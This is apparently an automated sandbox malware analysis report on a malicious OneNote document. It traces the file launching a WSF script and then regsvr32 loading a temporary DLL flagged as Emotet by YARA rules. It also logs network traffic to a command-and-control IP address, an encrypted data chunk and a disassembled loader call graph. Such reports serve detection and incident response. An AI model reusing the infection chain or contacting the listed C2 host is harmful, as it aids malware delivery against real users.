                                                                                                                                                                                                          2023-03-17 08:23:18 UTC304INData Raw: 31 36 30 30 0d 0a 39 9a 3d 2b 65 8d 41 43 56 87 71 78 48 fa 3e 68 e8 d2 51 42 7c bd 33 62 eb a3 63 64 7d 8f 53 26 19 c1 44 53 78 cb 67 39 63 dd 71 62 3a b4 35 74 6d d8 3e 59 40 9f 30 21 92 ba 34 48 af c1 69 00 a5 9c 35 7a 54 d9 45 37 f4 f0 2a 6b 6d c6 3f 2b c4 9d 41 43 49 d6 73 78 84 a6 3c 68 d1 21 50 42 28 e8 31 62 8f 00 60 64 3c 78 52 26 89 94 46 53 24 69 64 39 9a 2e 70 62 99 e0 37 74 d9 7d 3d 59 28 6e 31 21 bd e1 36 48 27 64 6a 00 c1 63 34 7a af 85 47 37 e4 54 29 6b 27 31 3e 2b 5d c2 43 43 71 7c 70 78 f5 51 3d 68 28 85 53 42 f8 40 32 62 04 0a 60 64 15 de 51 26 35 3d 45 53 a3 60 64 39 6f 8b 73 62 cd 48 34 74 28 75 3d 59 10 cc 32 21 0d 4f 35 48 1a 6c 6a 00 e9 c5 37 7a 7f 28 44 37 1e 5c 29 6b 79 99 3d 2b 2d 6d 40 43 1b 64 70 78 10 f9 3e 68 00 31 50 42 f2
                                                                                                                                                                                                          Data Ascii: 16009=+eACVqxH>hQB|3bcd}S&DSxg9cqb:5tm>Y@0!4Hi5zTE7*km?+ACIsx<h!PB(1b`d<xR&FS$id9.pb7t}=Y(n1!6H'djc4zG7T)k'1>+]CCq|pxQ=h(SB@2b`dQ&5=ES`d9osbH4t(u=Y2!O5Hlj7z(D7\)ky=+-m@Cdpx>h1PB


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          1192.168.2.449700182.162.143.56443C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          2023-03-17 08:24:12 UTC310OUTPOST /xqnhpb/ HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                          Host: 182.162.143.56
                                                                                                                                                                                                          2023-03-17 08:24:13 UTC310INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Fri, 17 Mar 2023 08:23:29 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2023-03-17 08:24:13 UTC310INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                          Start time:09:22:49
                                                                                                                                                                                                          Start date:17/03/2023
                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\iMedPub_LTD_6.one
                                                                                                                                                                                                          Imagebase:0xb90000
                                                                                                                                                                                                          File size:1676072 bytes
                                                                                                                                                                                                          MD5 hash:8D7E99CB358318E1F38803C9E6B67867
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                          Start time:09:23:14
                                                                                                                                                                                                          Start date:17/03/2023
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
                                                                                                                                                                                                          Imagebase:0xdc0000
                                                                                                                                                                                                          File size:147456 bytes
                                                                                                                                                                                                          MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.408902760.0000000005AFF000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                          Start time:09:23:19
                                                                                                                                                                                                          Start date:17/03/2023
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll
                                                                                                                                                                                                          Imagebase:0x8c0000
                                                                                                                                                                                                          File size:20992 bytes
                                                                                                                                                                                                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                          Start time:09:23:19
                                                                                                                                                                                                          Start date:17/03/2023
                                                                                                                                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline: "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll"
                                                                                                                                                                                                          Imagebase:0x7ff73b770000
                                                                                                                                                                                                          File size:24064 bytes
                                                                                                                                                                                                          MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.382454189.0000000001290000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                          Start time:09:23:22
                                                                                                                                                                                                          Start date:17/03/2023
                                                                                                                                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\JURwocL\wAXwf.dll"
                                                                                                                                                                                                          Imagebase:0x7ff73b770000
                                                                                                                                                                                                          File size:24064 bytes
                                                                                                                                                                                                          MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.884606012.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 00000004.00000002.884803420.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.885272914.0000000002521000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                          Start time:09:23:29
                                                                                                                                                                                                          Start date:17/03/2023
                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:/tsr
                                                                                                                                                                                                          Imagebase:0xad0000
                                                                                                                                                                                                          File size:157872 bytes
                                                                                                                                                                                                          MD5 hash:DBCFA6F25577339B877D2305CAD3DEC3
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:8.7%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:7.4%
                                                                                                                                                                                                            Signature Coverage:5.9%
                                                                                                                                                                                                            Total number of Nodes:338
                                                                                                                                                                                                            Total number of Limit Nodes:9
                                                                                                                                                                                                            execution_graph 8532 28e80cc 8533 28e80f3 8532->8533 8534 28e82ba 8533->8534 8536 28fe9e8 8533->8536 8539 28e8bc8 8536->8539 8538 28feab4 8538->8533 8541 28e8c02 8539->8541 8540 28e8eb8 8540->8538 8541->8540 8542 28e8d6f Process32FirstW 8541->8542 8542->8541 8543 180001184 8550 180002a30 8543->8550 8546 180001191 8559 180002d5c 8550->8559 8553 180006cf0 8585 180007f30 GetLastError 8553->8585 8555 18000119a 8555->8546 8556 180002a44 8555->8556 8646 180002cf0 8556->8646 8558 180002a4f 8558->8546 8560 18000118d 8559->8560 8561 180002d7b GetLastError 8559->8561 8560->8546 8560->8553 8571 18000479c 8561->8571 8563 180002d8e 8564 180002e00 SetLastError 8563->8564 8565 1800047e4 __vcrt_freeptd 6 API calls 8563->8565 8570 180002d9e __std_exception_copy 8563->8570 8564->8560 8566 180002dae 8565->8566 8566->8564 8567 180002dd5 8566->8567 8568 1800047e4 __vcrt_freeptd 6 API calls 8566->8568 8569 1800047e4 __vcrt_freeptd 6 API calls 8567->8569 8567->8570 8568->8567 8569->8570 8570->8564 8575 1800045bc 8571->8575 8576 1800046e3 TlsGetValue 8575->8576 8583 180004600 __vcrt_InitializeCriticalSectionEx 8575->8583 8577 18000462e LoadLibraryExW 8578 1800046a5 8577->8578 8579 18000464f GetLastError 8577->8579 8580 1800046c5 GetProcAddress 8578->8580 8581 1800046bc FreeLibrary 8578->8581 8579->8583 8580->8576 8582 1800046d6 8580->8582 8581->8580 8582->8576 8583->8576 8583->8577 8583->8580 8584 180004671 LoadLibraryExW 8583->8584 8584->8578 8584->8583 8586 180007f71 FlsSetValue 8585->8586 8592 180007f54 8585->8592 8587 180007f83 8586->8587 8591 180007f61 SetLastError 8586->8591 8602 180008714 8587->8602 8591->8555 8592->8586 8592->8591 8593 180007fb0 FlsSetValue 8596 180007fbc FlsSetValue 8593->8596 8597 180007fce 8593->8597 8594 180007fa0 FlsSetValue 8595 180007fa9 8594->8595 8609 18000878c 8595->8609 8596->8595 8615 180007b24 8597->8615 8603 180008725 _invalid_parameter_noinfo 8602->8603 8604 180008776 8603->8604 8605 18000875a RtlAllocateHeap 8603->8605 8620 18000abf8 8603->8620 8623 1800086f4 8604->8623 8605->8603 8606 180007f92 8605->8606 8606->8593 8606->8594 8610 180008791 HeapFree 8609->8610 8611 1800087c0 8609->8611 8610->8611 8612 1800087ac GetLastError 8610->8612 8611->8591 8613 1800087b9 Concurrency::details::SchedulerProxy::DeleteThis 8612->8613 8614 1800086f4 Concurrency::details::SchedulerProxy::DeleteThis 9 API calls 8613->8614 8614->8611 8632 1800079fc 8615->8632 8626 18000ac38 8620->8626 8624 180007f30 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8623->8624 8625 1800086fd 8624->8625 8625->8606 8631 180008160 EnterCriticalSection 8626->8631 8644 180008160 EnterCriticalSection 8632->8644 8647 180002d1e __std_exception_copy 8646->8647 8649 180002d04 8646->8649 8647->8558 8648 180002d0e 8652 1800047e4 8648->8652 8649->8648 8650 18000479c __vcrt_freeptd 6 API calls 8649->8650 8650->8648 8653 1800045bc __vcrt_InitializeCriticalSectionEx 5 API calls 8652->8653 8654 180004812 8653->8654 8655 180004824 TlsSetValue 8654->8655 8656 18000481c 8654->8656 8655->8656 8656->8647 8657 180001138 8658 180001141 __scrt_acquire_startup_lock 8657->8658 8659 180001145 8658->8659 8661 1800063cc 8658->8661 8662 1800063ec 8661->8662 8663 180006403 8661->8663 8664 1800063f4 8662->8664 8665 18000640a 8662->8665 8663->8659 8666 1800086f4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8664->8666 8692 180009cd8 8665->8692 8668 1800063f9 8666->8668 8722 1800085b8 8668->8722 8677 180006481 8679 1800086f4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8677->8679 8678 180006499 8680 1800061a4 47 API calls 8678->8680 8681 180006486 8679->8681 8685 1800064b5 8680->8685 8682 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8681->8682 8682->8663 8683 1800064bb 8684 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8683->8684 8684->8663 8685->8683 8686 1800064e7 8685->8686 8687 180006500 8685->8687 8688 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8686->8688 8689 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8687->8689 8690 1800064f0 8688->8690 8689->8683 8691 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8690->8691 8691->8663 8693 18000640f 8692->8693 8694 180009ce5 8692->8694 8698 1800093bc GetModuleFileNameW 8693->8698 8725 180007e8c 8694->8725 8699 180009401 GetLastError 8698->8699 8700 180009415 8698->8700 9031 180008668 8699->9031 8701 1800091fc 47 API calls 8700->8701 8703 180009443 8701->8703 8707 180009454 8703->8707 9036 18000a5f0 8703->9036 8704 1800010b0 _log10_special 8 API calls 8706 180006426 8704->8706 8710 1800061a4 8706->8710 9039 1800092a0 8707->9039 8709 18000940e 8709->8704 8712 1800061e2 8710->8712 8714 18000624e 8712->8714 9053 18000a088 8712->9053 8713 18000633f 8716 18000636c 8713->8716 8714->8713 8715 18000a088 47 API calls 8714->8715 8715->8714 8717 1800063bc 8716->8717 8718 180006384 8716->8718 8717->8677 8717->8678 8718->8717 8719 180008714 _invalid_parameter_noinfo 11 API calls 8718->8719 8720 1800063b2 8719->8720 8721 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8720->8721 8721->8717 9057 180008450 8722->9057 8726 180007eb8 FlsSetValue 8725->8726 8727 180007e9d FlsGetValue 8725->8727 8729 180007eaa 8726->8729 8730 180007ec5 8726->8730 8728 180007eb2 8727->8728 8727->8729 8728->8726 8731 180007eb0 8729->8731 8768 180006e28 8729->8768 8733 180008714 _invalid_parameter_noinfo 11 API calls 8730->8733 8745 1800099b0 8731->8745 8735 180007ed4 8733->8735 8736 180007ef2 FlsSetValue 8735->8736 8737 180007ee2 FlsSetValue 8735->8737 8739 180007efe FlsSetValue 8736->8739 8740 180007f10 8736->8740 8738 180007eeb 8737->8738 8742 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8738->8742 8739->8738 8741 180007b24 _invalid_parameter_noinfo 11 API calls 8740->8741 8743 180007f18 8741->8743 8742->8729 8744 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8743->8744 8744->8731 8856 180009c20 8745->8856 8747 1800099e5 8871 1800096b0 8747->8871 8751 180009a13 8752 180009a1b 8751->8752 8754 180009a2a 8751->8754 8753 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8752->8753 8767 180009a02 8753->8767 8754->8754 8885 180009d54 8754->8885 8757 180009b26 8758 1800086f4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8757->8758 8761 180009b2b 8758->8761 8759 180009b81 8762 180009be8 8759->8762 8896 1800094e0 8759->8896 8760 180009b40 8760->8759 8764 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8760->8764 8763 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8761->8763 8766 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8762->8766 8763->8767 8764->8759 8766->8767 8767->8693 8777 18000acb8 8768->8777 8811 18000ac70 8777->8811 8816 180008160 EnterCriticalSection 8811->8816 8857 180009c43 8856->8857 8859 180009c4d 8857->8859 8911 180008160 EnterCriticalSection 8857->8911 8860 180009cbf 8859->8860 8863 180006e28 _CreateFrameInfo 47 API calls 8859->8863 8860->8747 8864 180009cd7 8863->8864 8866 180009d2a 8864->8866 8868 180007e8c 52 API calls 8864->8868 8866->8747 8869 180009d14 8868->8869 8870 1800099b0 67 API calls 8869->8870 8870->8866 8912 1800091fc 8871->8912 8874 1800096e2 8876 1800096f7 8874->8876 8877 1800096e7 GetACP 8874->8877 8875 1800096d0 GetOEMCP 8875->8876 8876->8767 8878 18000b4c4 8876->8878 8877->8876 8879 18000b4d3 _invalid_parameter_noinfo 8878->8879 8880 18000b50f 8878->8880 8879->8880 8882 18000b4f6 HeapAlloc 8879->8882 8884 18000abf8 _invalid_parameter_noinfo 2 API calls 8879->8884 8881 1800086f4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8880->8881 8883 18000b50d 8881->8883 8882->8879 8882->8883 8883->8751 8884->8879 8886 1800096b0 49 API calls 8885->8886 8887 180009d81 8886->8887 8889 180009dbe IsValidCodePage 8887->8889 8894 180009ed7 8887->8894 8895 180009dd8 _CreateFrameInfo 8887->8895 8888 1800010b0 _log10_special 8 API calls 8890 180009b1d 8888->8890 8891 180009dcf 8889->8891 8889->8894 8890->8757 8890->8760 8892 180009dfe GetCPInfo 8891->8892 8891->8895 8892->8894 8892->8895 8894->8888 8944 1800097c8 8895->8944 9030 180008160 EnterCriticalSection 8896->9030 8913 18000921b 8912->8913 8914 180009220 8912->8914 8913->8874 8913->8875 8914->8913 8915 180007db8 _CreateFrameInfo 47 API calls 8914->8915 8916 18000923b 8915->8916 8920 18000b524 8916->8920 8921 18000b539 8920->8921 8922 18000925e 8920->8922 8921->8922 8928 18000bfb4 8921->8928 8924 18000b590 8922->8924 8925 18000b5a5 8924->8925 8926 18000b5b8 8924->8926 8925->8926 8941 180009d38 8925->8941 8926->8913 8929 180007db8 _CreateFrameInfo 47 API calls 8928->8929 8930 18000bfc3 8929->8930 8931 18000c00e 8930->8931 8940 180008160 EnterCriticalSection 8930->8940 8931->8922 8942 180007db8 _CreateFrameInfo 47 API calls 8941->8942 8943 180009d41 8942->8943 8945 180009805 GetCPInfo 8944->8945 8946 1800098fb 8944->8946 8945->8946 8951 180009818 8945->8951 8947 1800010b0 _log10_special 8 API calls 8946->8947 8949 18000999a 8947->8949 8949->8894 8955 18000caa4 8951->8955 8956 1800091fc 47 API calls 8955->8956 8957 18000cae6 8956->8957 8975 18000a0c4 8957->8975 8976 18000a0cd MultiByteToWideChar 8975->8976 9032 180007f30 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9031->9032 9033 180008675 Concurrency::details::SchedulerProxy::DeleteThis 9032->9033 9034 180007f30 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9033->9034 9035 180008697 9034->9035 9035->8709 9037 18000a3dc 5 API calls 9036->9037 9038 18000a610 9037->9038 9038->8707 9040 1800092df 9039->9040 9042 1800092c4 9039->9042 9041 1800092e4 9040->9041 9043 18000a154 WideCharToMultiByte 9040->9043 9041->9042 9046 1800086f4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9041->9046 9042->8709 9044 18000933b 9043->9044 9044->9041 9045 180009342 GetLastError 9044->9045 9048 18000936d 9044->9048 9047 180008668 11 API calls 9045->9047 9046->9042 9049 18000934f 9047->9049 9050 18000a154 WideCharToMultiByte 9048->9050 9051 1800086f4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9049->9051 9052 180009394 9050->9052 9051->9042 9052->9042 9052->9045 9054 18000a014 9053->9054 9055 1800091fc 47 API calls 9054->9055 9056 18000a038 9055->9056 9056->8712 9058 18000847b 9057->9058 9065 1800084ec 9058->9065 9061 1800084c5 9063 180006ef0 _invalid_parameter_noinfo 47 API calls 9061->9063 9064 1800084da 9061->9064 9063->9064 9064->8663 9090 180008234 9065->9090 9069 1800084a2 9069->9061 9075 180006ef0 9069->9075 9076 180006f48 9075->9076 9077 180006eff GetLastError 9075->9077 9076->9061 9078 180006f14 9077->9078 9079 180007ff8 _invalid_parameter_noinfo 16 API calls 9078->9079 9080 180006f2e SetLastError 9079->9080 9080->9076 9081 180006f51 9080->9081 9082 180006e28 _CreateFrameInfo 45 API calls 9081->9082 9083 180006f56 9082->9083 9084 180006ef0 _invalid_parameter_noinfo 45 API calls 9083->9084 9085 180006f77 9084->9085 9120 18000b558 9085->9120 9091 18000828b 9090->9091 9092 180008250 GetLastError 9090->9092 9091->9069 9096 1800082a0 9091->9096 9093 180008260 9092->9093 9103 180007ff8 9093->9103 9097 1800082d4 9096->9097 9098 1800082bc GetLastError SetLastError 9096->9098 9097->9069 9099 1800085d8 IsProcessorFeaturePresent 9097->9099 9098->9097 9100 1800085eb 9099->9100 9101 1800082ec _CreateFrameInfo 14 API calls 9100->9101 9102 180008606 GetCurrentProcess TerminateProcess 9101->9102 9104 180008032 FlsSetValue 9103->9104 9105 180008017 FlsGetValue 9103->9105 9107 18000803f 9104->9107 9108 180008024 SetLastError 9104->9108 9106 18000802c 9105->9106 9105->9108 9106->9104 9109 180008714 _invalid_parameter_noinfo 11 API calls 9107->9109 9108->9091 9110 18000804e 9109->9110 9111 18000806c FlsSetValue 9110->9111 9112 18000805c FlsSetValue 9110->9112 9114 180008078 FlsSetValue 9111->9114 9115 18000808a 9111->9115 9113 180008065 9112->9113 9116 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9113->9116 9114->9113 9117 180007b24 _invalid_parameter_noinfo 11 API calls 9115->9117 9116->9108 9118 180008092 9117->9118 9119 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9118->9119 9119->9108 9121 18000b571 9120->9121 9123 180006f9f 9120->9123 9122 18000bfb4 _invalid_parameter_noinfo 47 API calls 9121->9122 9121->9123 9122->9123 9124 18000b5c4 9123->9124 9125 18000b5dd 9124->9125 9127 180006faf 9124->9127 9126 180009d38 _invalid_parameter_noinfo 47 API calls 9125->9126 9125->9127 9126->9127 9127->9061 9128 28e4214 9129 28e4256 9128->9129 9132 28f3988 9129->9132 9131 28e44c6 9134 28f3a29 9132->9134 9133 28f3acc CreateProcessW 9133->9131 9134->9133 9135 180010a8e ExitProcess 9138 180014c90 LoadStringW LoadStringW 9135->9138 9147 1800109d0 LoadCursorW RegisterClassExW 9138->9147 9140 180014cec 9148 180010910 CreateWindowExW 9140->9148 9142 180014d02 GetMessageW 9143 180010ab3 9142->9143 9144 180014d19 TranslateAcceleratorW 9142->9144 9145 180014cfa 9144->9145 9146 180014d2f TranslateMessage DispatchMessageW 9144->9146 9145->9142 9145->9143 9146->9145 9147->9140 9149 1800109a1 ShowWindow UpdateWindow 9148->9149 9150 18001099d 9148->9150 9149->9150 9150->9145 9151 ed0000 9155 ed015a 9151->9155 9152 ed033f GetNativeSystemInfo 9153 ed0377 VirtualAlloc 9152->9153 9157 ed08eb 9152->9157 9154 ed0395 VirtualAlloc 9153->9154 9160 ed03aa 9153->9160 9154->9160 9155->9152 9155->9157 9156 ed0873 9156->9157 9158 ed08c6 RtlAddFunctionTable 9156->9158 9158->9157 9159 ed084b VirtualProtect 9159->9160 9160->9156 9160->9159 9160->9160

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 00ED0000 Relevance: 55.2, APIs: 5, Strings: 26, Instructions: 953memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 0 ed0000-ed029a call ed091c * 2 13 ed0905 0->13 14 ed02a0-ed02a4 0->14 15 ed0907-ed091a 13->15 14->13 16 ed02aa-ed02ae 14->16 16->13 17 ed02b4-ed02b8 16->17 17->13 18 ed02be-ed02c5 17->18 18->13 19 ed02cb-ed02dc 18->19 19->13 20 ed02e2-ed02eb 19->20 20->13 21 ed02f1-ed02fc 20->21 21->13 22 ed0302-ed0312 21->22 23 ed033f-ed0371 GetNativeSystemInfo 22->23 24 ed0314-ed031a 22->24 23->13 25 ed0377-ed0393 VirtualAlloc 23->25 26 ed031c-ed0324 24->26 27 ed03aa-ed03ae 25->27 28 ed0395-ed03a8 VirtualAlloc 25->28 29 ed032c-ed032d 26->29 30 ed0326-ed032a 26->30 32 ed03dc-ed03e3 27->32 33 ed03b0-ed03c2 27->33 28->27 31 ed032f-ed033d 29->31 30->31 31->23 31->26 35 ed03fb-ed0417 32->35 36 ed03e5-ed03f9 32->36 34 ed03d4-ed03d8 33->34 37 ed03da 34->37 38 ed03c4-ed03d1 34->38 39 ed0419-ed041a 35->39 40 ed0458-ed0465 35->40 36->35 36->36 37->35 38->34 43 ed041c-ed0422 39->43 41 ed046b-ed0472 40->41 42 ed0537-ed0542 40->42 41->42 46 ed0478-ed0485 41->46 44 ed0548-ed0559 42->44 45 ed06e6-ed06ed 42->45 47 ed0448-ed0456 43->47 48 ed0424-ed0446 43->48 49 ed0562-ed0565 44->49 51 ed07ac-ed07c3 45->51 52 ed06f3-ed0707 45->52 46->42 50 ed048b-ed048f 46->50 47->40 47->43 48->47 48->48 53 ed055b-ed055f 49->53 54 ed0567-ed0574 49->54 55 ed051b-ed0525 50->55 58 ed07c9-ed07cd 51->58 59 ed087a-ed088d 51->59 56 ed070d 52->56 57 ed07a9-ed07aa 52->57 53->49 60 ed060d-ed0619 54->60 61 ed057a-ed057d 54->61 64 ed052b-ed0531 55->64 65 ed0494-ed04a8 55->65 62 ed0712-ed0736 56->62 57->51 63 ed07d0-ed07d3 58->63 80 ed088f-ed089a 59->80 81 ed08b3-ed08ba 59->81 72 ed061f 60->72 73 ed06e2-ed06e3 60->73 61->60 68 ed0583-ed059b 61->68 89 ed0738-ed073e 62->89 90 ed0796-ed079f 62->90 70 ed085f-ed086d 63->70 71 ed07d9-ed07e9 63->71 64->42 64->50 66 ed04cf-ed04d3 65->66 67 ed04aa-ed04cd 65->67 76 ed04d5-ed04e1 66->76 77 ed04e3-ed04e7 66->77 75 ed0518-ed0519 67->75 68->60 78 ed059d-ed059e 68->78 70->63 74 ed0873-ed0874 70->74 82 ed080d-ed080f 71->82 83 ed07eb-ed07ed 71->83 84 ed0625-ed0648 72->84 73->45 74->59 75->55 85 ed0511-ed0515 76->85 87 ed04fe-ed0502 77->87 88 ed04e9-ed04fc 77->88 86 ed05a0-ed0605 78->86 91 ed08ab-ed08b1 80->91 94 ed08bc-ed08c4 81->94 95 ed08eb-ed0903 81->95 96 ed0811-ed0820 82->96 97 ed0822-ed082b 82->97 92 ed07ef-ed07f9 83->92 93 ed07fb-ed080b 83->93 113 ed064a-ed064b 84->113 114 ed06b2-ed06b7 84->114 85->75 86->86 101 ed0607 86->101 87->75 99 ed0504-ed050e 87->99 88->85 102 ed0748-ed0754 89->102 103 ed0740-ed0746 89->103 90->62 98 ed07a5-ed07a6 90->98 91->81 104 ed089c-ed08a8 91->104 100 ed082e-ed083d 92->100 93->100 94->95 106 ed08c6-ed08e9 RtlAddFunctionTable 94->106 95->15 96->100 97->100 98->57 99->85 107 ed083f-ed0845 100->107 108 ed084b-ed085c VirtualProtect 100->108 101->60 111 ed0764-ed0776 102->111 112 ed0756-ed0757 102->112 110 ed077b-ed078d 103->110 104->91 106->95 107->108 108->70 110->90 125 ed078f-ed0794 110->125 111->110 119 ed0759-ed0762 112->119 115 ed064e-ed0651 113->115 116 ed06ce-ed06d8 114->116 117 ed06b9-ed06bd 114->117 121 ed065b-ed0666 115->121 122 ed0653-ed0659 115->122 116->84 123 ed06de-ed06df 116->123 117->116 124 ed06bf-ed06c3 117->124 119->111 119->119 127 ed0668-ed0669 121->127 128 ed0676-ed0688 121->128 126 ed068d-ed06a3 122->126 123->73 124->116 129 ed06c5 124->129 125->89 132 ed06ac 126->132 133 ed06a5-ed06aa 126->133 130 ed066b-ed0674 127->130 128->126 129->116 130->128 130->130 132->114 133->115
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382242216.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ed0000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                                                                                            • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                                                                                                                            • API String ID: 394283112-3605381585
